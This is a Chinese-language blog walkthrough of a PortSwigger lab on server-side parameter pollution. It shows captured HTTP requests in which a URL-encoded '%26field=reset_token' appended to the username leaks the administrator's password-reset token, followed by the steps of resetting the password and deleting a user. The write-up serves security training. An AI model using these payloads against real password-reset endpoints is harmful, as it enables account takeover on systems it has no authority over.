portswigger学习--Exploiting server-side parameter pollution in a query string

大黑牛
72 阅读1分钟

portswigger.net/web-securit…

1 Overview

To solve the lab, log in as the administrator and delete carlos.

2 Required knowledge

To solve this lab, you'll need to know:

  • How to use URL query syntax to attempt to change a server-side request.
  • How to use error messages to build an understanding of how a server-side API processes user input.

These points are covered in our API Testing Academy topic.

3 靶场思路

3.1 正常业务流程

  1. portswigger靶场介绍页面进入靶场,点击My account image.png

  2. 进入登录页面后,发现需要输入账号和密码,靶机只提供了账号,没有密码,尝试使用忘记密码功能,点击Forgot password? image.png

  3. 进入忘记密码功能后,填入账号``后,查看返回报文信息 image.png 返回报文信息

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 49

{"type":"email","result":"*****@normal-user.net"}

到此,正常能在页面操作的功能都尝试访问了

3.2 解题思路

  1. 在 burpsuite 中查看所有请求信息,重点关注 MIME typeJSON 和 js 文件 image.png

  2. 在 js 文件中发现一个隐藏接口,忘记密码重置密码的接口

window.location.href = `/forgot-password?reset_token=${resetToken}`;
  1. 分析忘记密码接口的请求和返回报文,关联到步骤 2,想尝试在这里获取重置密码的 reset_token
请求报文

POST /forgot-password HTTP/2
Host: 0ad4004a04b943b082fe7a170049001b.web-security-academy.net
Cookie: session=wOaQvACArgsWkjNSfPJiFK3PRBzLid2L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://0ad4004a04b943b082fe7a170049001b.web-security-academy.net/forgot-password
Content-Type: x-www-form-urlencoded
Content-Length: 60
Origin: https://0ad4004a04b943b082fe7a170049001b.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

csrf=HX0JNPBxshNQShsi8jtxRPMvofsuJSy6&username=administrator

返回报文

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 49

{"type":"email","result":"*****@normal-user.net"}
  1. 尝试找到隐藏字段能让服务端逻辑受影响,想尝试修改 email,让重置密码的 reset_token发送我指定的邮箱
修改请求 body,增加&email=1
csrf=iD1m6AqR2S8TGapUzeVgignHwEDHdDJ7&username=administrator&email=1

返回报文没变化
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 49

{"type":"email","result":"*****@normal-user.net"}

-------------------------------分割线-----------------------------------

修改请求 body,增加 %26email=1
csrf=iD1m6AqR2S8TGapUzeVgignHwEDHdDJ7&username=administrator%26email=1

返回报文,报错说明受影响了,关键点在将 & 进行 URL encode
HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 40

{"error": "Parameter is not supported."}
  1. 经过多次尝试,找到关键属性 field,能有效的影响服务端的处理逻辑,成功获取 reset_token
在请求报文中的 body 中增加 %26field=username
csrf=iD1m6AqR2S8TGapUzeVgignHwEDHdDJ7&username=administrator%26field=username

返回报文
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 44

{"result":"administrator","type":"username"}

-------------------------------分割线-----------------------------------

在请求报文中的 body 中增加 %26field=reset_token
csrf=iD1m6AqR2S8TGapUzeVgignHwEDHdDJ7&username=administrator%26field=reset_token

返回报文
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 66

{"result":"rtam20wzikva6pxec10rbcqzou11yojn","type":"reset_token"}
  1. 使用获取到的 reset_token,访问 /forgot-password?reset_token=${resetToken},需要将 resetToken 替换成步骤 5 获取的值,重置 administrator 的密码 image.png
  2. 重新访问登录页面,填入用户名 administrator 和重置后的密码,登录成功,点击 Admin panel image.png
  3. 删除用户carlos image.png
  4. 至此此靶场已经完成,成功删除用户carlos image.png
avatar
文章
阅读
粉丝